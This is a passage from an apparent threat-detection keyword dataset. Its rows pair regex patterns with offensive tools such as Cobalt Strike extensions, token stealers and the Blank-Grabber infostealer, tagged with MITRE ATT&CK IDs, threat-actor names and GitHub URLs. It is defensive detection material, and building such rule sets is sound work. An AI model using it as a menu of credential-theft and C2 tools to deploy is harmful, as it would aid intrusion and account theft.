T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - 
TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60363" "*Start-WebServer.ps1*",".{0,1000}Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","60364" "*StartWebServiceBeacon*",".{0,1000}StartWebServiceBeacon.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","60365" "*static_syscalls_apc_spawn *",".{0,1000}static_syscalls_apc_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60368" "*static_syscalls_apc_spawn*",".{0,1000}static_syscalls_apc_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 
- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60369" "*static_syscalls_dump*",".{0,1000}static_syscalls_dump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* 
- FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60370" "*statistically-likely-usernames*",".{0,1000}statistically\-likely\-usernames.{0,1000}","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","N/A","10","1064","149","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z","60371" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60372" "*StayKit.cna*",".{0,1000}StayKit\.cna.{0,1000}","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. 
The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60373" "*StayKit.exe*",".{0,1000}StayKit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - 
APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60374" "*StayKit.git*",".{0,1000}StayKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","N/A","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","60375" "*Steal_Pipe_Token /PipeName*",".{0,1000}Steal_Pipe_Token\s\/PipeName.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","60378" "*steal_token *",".{0,1000}steal_token\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","60379" "*steal_token(*",".{0,1000}steal_token\(.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera 
- Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","N/A","10","10","142","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z","60380" "*steal_token.py*",".{0,1000}steal_token\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","60381" "*steal_token_access_mask*",".{0,1000}steal_token_access_mask.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","60382" "*steal-cert.py*",".{0,1000}steal\-cert\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","60383" "*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*",".{0,1000}StealCookie\-28050355\-D9DF\-4CE7\-BFBC\-4F7DDE890C2A\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","60384" "*StealDhcpSecrets.c*",".{0,1000}StealDhcpSecrets\.c.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","60385" "*StealDhcpSecrets.exe*",".{0,1000}StealDhcpSecrets\.exe.{0,1000}","offensive_tool_keyword","StealDhcpSecrets","DHCP Server DNS Password Stealer","T1552 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/tree/master/PasswordStealing/DHCP","1","1","N/A","N/A","10","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","60386" "*Stealer finished its work*",".{0,1000}Stealer\sfinished\sits\swork.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60387" "*Stealer.exe *",".{0,1000}Stealer\.exe\s.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","60388" "*Stealing browser data*",".{0,1000}Stealing\sbrowser\sdata.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60389" "*Stealing crypto wallets*",".{0,1000}Stealing\scrypto\swallets.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60390" "*Stealing discord tokens*",".{0,1000}Stealing\sdiscord\stokens.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60391" "*Stealing Epic session*",".{0,1000}Stealing\sEpic\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60392" "*Stealing Growtopia session*",".{0,1000}Stealing\sGrowtopia\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60393" "*Stealing Minecraft related files*",".{0,1000}Stealing\sMinecraft\srelated\sfiles.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60394" "*Stealing Roblox cookies*",".{0,1000}Stealing\sRoblox\scookies.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60395" "*Stealing Steam 
session*",".{0,1000}Stealing\sSteam\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60396" "*Stealing system information*",".{0,1000}Stealing\ssystem\sinformation.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60397" "*Stealing telegram sessions*",".{0,1000}Stealing\stelegram\ssessions.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60398" "*Stealing Uplay session*",".{0,1000}Stealing\sUplay\ssession.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","60399" "*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*",".{0,1000}StealPowerAutomateToken\-C4E7B7DA\-54E4\-49AB\-B634\-FCCD77C65025\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","60400" 
"*stealthhackerpro@yahoo.com*",".{0,1000}stealthhackerpro\@yahoo\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","60401" "*StealTokenClient.exe *",".{0,1000}StealTokenClient\.exe\s.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60402" "*StealTokenClient\StealTokenClient.cs*",".{0,1000}StealTokenClient\\StealTokenClient\.cs.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60403" "*StealTokenDrv_x64.sys*",".{0,1000}StealTokenDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","60404" "*Sticky Key backdoor has been 
